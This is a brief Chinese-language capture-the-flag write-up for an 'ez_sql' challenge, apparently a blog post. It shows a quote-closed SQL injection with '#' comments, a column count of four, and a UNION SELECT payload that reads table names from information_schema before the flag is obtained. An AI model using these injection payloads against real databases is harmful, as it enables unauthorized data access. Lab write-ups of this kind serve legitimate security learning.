Loading

ez_sql WP

ez_sql WP

首先输入一个数字,我们输入 \(1\) 后,呈现为这样。

image

随后判断为字符型,闭合方式为 ',这里有个地方要注意,就是要用 # 来注释。 1' #

然后判断列数:

image
image

判断得到列数为 4。

后面继续像前面 sqli-lab 的操作。

0' union select 1, 2, 3 , group_concat(table_name) from information_schema.tables where table_schema=database() #

image

image

image

最终得到 flag。

image

posted @ 2025-11-30 11:32  yi_fan0305  阅读(0)  评论(0)    收藏  举报